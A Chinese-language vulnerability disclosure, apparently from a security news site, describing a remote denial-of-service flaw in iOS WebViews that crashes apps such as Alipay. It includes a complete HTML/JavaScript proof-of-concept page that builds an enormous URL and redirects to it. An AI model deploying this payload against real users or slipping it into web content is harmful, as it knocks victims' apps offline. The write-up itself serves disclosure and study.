概述
近期分析一个iOS APP Crash时发现在应用内打开好友发送的URL链接时应用假死后直接挂掉。经排查确认是iOS WebViews存在远程拒绝服务漏洞,攻击者可以利用这个漏洞使打开恶意网页的应用、iOS Safari浏览器拒绝服务。这个漏洞的利用方法非常简单,攻击者可以轻易的使用该漏洞进行攻击。
涉及设备:iPhone、iPad、iTouch
涉及系统:iOS 8.4~10.1.1
APP:支付宝 V9.9.6
漏洞危害
攻击者在调用WebViews的APP(微信、QQ、微博….)中发送恶意链接或使用其他方式诱导受害者点击链接来启动恶意页面。一旦这个页面打开你会发现页面内容加载出来后,无论你怎么点击页面,APP或Safari浏览器都没有反应,数秒后直接崩溃掉。
下面是Remote DOS APP POC,Safari浏览器的POC暂不放出。
Remote DOS APP POC:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
<html>
<head>
<title>DOS POC</title>
</head>
<body>
<h1>Start Attack - By MrYu.</h1>
<script>
y = "asddfg";
for (i = 0; i < 10000000; i++) {
y = y + "189768765409685743";
}
function attack() {
window.location.href = y;
}
setTimeout("attack()", 1100);
</script>
</body>
</html>
|
在恶意html页面内嵌入JavaScript代码,看代码可知程序生成了非常长的数字并把这些数字拼接到了url中,iOS WebView在处理庞大字节URL链接出现异常导致APP崩溃。
演示视频
总结
受影响的不仅仅是支付宝,很多厂商SRC遇到这样的DOS漏洞通常会以“系统问题”为由而拒收。本文仅仅是把问题抛出来,漏洞影响和是否值得修复,大家可以酌情处理。
本文由 安全客 原创发布,作者:mryu1